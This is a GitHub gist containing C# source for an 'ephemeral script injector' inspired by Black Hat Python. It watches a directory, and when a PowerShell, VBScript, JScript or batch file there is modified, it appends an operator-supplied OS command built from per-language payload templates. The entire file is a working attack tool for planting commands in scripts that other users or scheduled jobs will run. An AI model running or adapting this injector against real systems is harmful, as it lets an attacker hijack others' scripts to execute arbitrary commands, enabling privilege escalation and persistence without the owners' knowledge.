Last active
October 6, 2018 00:19
-
-
Save 3xocyte/8f99a7fb232368c086898987415a5ebf to your computer and use it in GitHub Desktop.
a small buggy utility inspired by chapter 10 of Black Hat Python by Justin Seitz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Linq; | |
| using System.Collections.Generic; | |
| // ephemeral script injector by @3xocyte | |
| // takes a target directory to watch, and an OS command to attempt to inject into any scripts that get modified | |
| namespace FileContentInjector | |
| { | |
| // templates for payload injection | |
| public static class PayloadTemplates | |
| { | |
| public static string ps1PayloadTemplate = "\r\ncmd /c COMMANDGOESHERE\r\n"; | |
| public static string vbsPayloadTemplate = "\r\nCreateObject(\"WScript.Shell\").Run \"COMMANDGOESHERE\", 0, True\r\n"; | |
| public static string jsPayloadTemplate = "\r\nnew ActiveXObject(\"WScript.shell\").run(\"COMMANDGOESHERE\");\r\n"; | |
| public static string batPayloadTemplate = "\r\nCOMMANDGOESHERE\r\n"; | |
| } | |
| class Program | |
| { | |
| static string injectedPayload = null; | |
| static string path = null; | |
| // to track injected files so we don't re-inject them and end up in an infinite loop | |
| static List<string> injectedFile = new List<string>(); | |
| static string ps1Payload = null; | |
| static string vbsPayload = null; | |
| static string jsPayload = null; | |
| static string batPayload = null; | |
| static void Main(string[] args) | |
| { | |
| try | |
| { | |
| path = args[0]; | |
| Console.WriteLine("[*] path set: " + path); | |
| string placeholder = "COMMANDGOESHERE"; | |
| string commandToRun = args[1]; | |
| ps1Payload = PayloadTemplates.ps1PayloadTemplate.Replace(placeholder, commandToRun); | |
| vbsPayload = PayloadTemplates.vbsPayloadTemplate.Replace(placeholder, commandToRun); | |
| jsPayload = PayloadTemplates.jsPayloadTemplate.Replace(placeholder, commandToRun); | |
| batPayload = PayloadTemplates.batPayloadTemplate.Replace(placeholder, commandToRun); | |
| if (Directory.Exists(path)) | |
| { | |
| Console.WriteLine("[*] directory contents: "); | |
| Directory.GetFiles(path).ToList().ForEach(s => Console.WriteLine(s)); | |
| } | |
| else | |
| { | |
| Console.WriteLine("[*] path not found"); | |
| System.Environment.Exit(1); | |
| } | |
| } | |
| catch | |
| { | |
| Console.WriteLine("[*] usage: fileinjector.exe <directory> <command>"); | |
| System.Environment.Exit(1); | |
| } | |
| var watcher = new FileSystemWatcher(); | |
| // add event handlers | |
| watcher.Created += watcher_Created; | |
| watcher.Changed += watcher_Changed; | |
| watcher.Deleted += watcher_Deleted; | |
| watcher.Renamed += watcher_Renamed; | |
| watcher.Path = path; | |
| // get watching | |
| watcher.EnableRaisingEvents = true; | |
| Console.WriteLine("[*] watching files (press any key to exit)"); | |
| Console.ReadKey(); | |
| } | |
| private static void watcher_Renamed(object sender, RenamedEventArgs e) | |
| { | |
| Console.WriteLine("[*] file renamed: " + e.OldName + " to " + e.Name); | |
| } | |
| private static void watcher_Deleted(object sender, FileSystemEventArgs e) | |
| { | |
| Console.WriteLine("[*] file deleted: " + e.Name); | |
| } | |
| private static void watcher_Changed(object sender, FileSystemEventArgs e) | |
| { | |
| Console.WriteLine("[*] file changed: " + e.Name); | |
| if (!injectedFile.Contains(e.Name)) | |
| { | |
| if (injector(e.Name)) | |
| { | |
| injectedFile.Add(e.Name); | |
| } | |
| } | |
| } | |
| private static void watcher_Created(object sender, FileSystemEventArgs e) | |
| { | |
| string targetFile = path + "\\" + e.Name; | |
| string fileOwner = File.GetAccessControl(targetFile).GetOwner(typeof(System.Security.Principal.NTAccount)).ToString(); | |
| Console.WriteLine("[*] file created: " + e.Name + " owner: " + fileOwner); | |
| // if (!injectedFile.Contains(e.Name)) | |
| // { | |
| // if (injector(e.Name)) | |
| // { | |
| // injectedFile.Add(e.Name); | |
| // } | |
| // } | |
| } | |
| public static bool injector(string file) | |
| { | |
| string targetFile = path + "\\" + file; | |
| string ext = Path.GetExtension(targetFile).ToLower(); | |
| switch (ext) | |
| { | |
| case ".ps1": | |
| injectedPayload = ps1Payload; | |
| break; | |
| case ".vbs": | |
| injectedPayload = vbsPayload; | |
| break; | |
| case ".js": | |
| injectedPayload = jsPayload; | |
| break; | |
| case ".bat": | |
| injectedPayload = batPayload; | |
| break; | |
| default: | |
| injectedPayload = null; | |
| break; | |
| } | |
| if (!string.IsNullOrEmpty(injectedPayload)) | |
| { | |
| Console.WriteLine("[*] attempting to inject payload"); | |
| try | |
| { | |
| // currently trying to append, but FileMode.Create will overwrite | |
| using (FileStream fs = new FileStream(targetFile, FileMode.Append, FileAccess.Write, FileShare.ReadWrite)) | |
| using (StreamWriter sw = new StreamWriter(fs)) | |
| { | |
| sw.Write(injectedPayload); | |
| sw.Close(); | |
| } | |
| return true; | |
| } | |
| catch | |
| { | |
| Console.WriteLine("[!] could not inject payload"); | |
| return false; | |
| } | |
| } | |
| else | |
| { | |
| return false; | |
| } | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment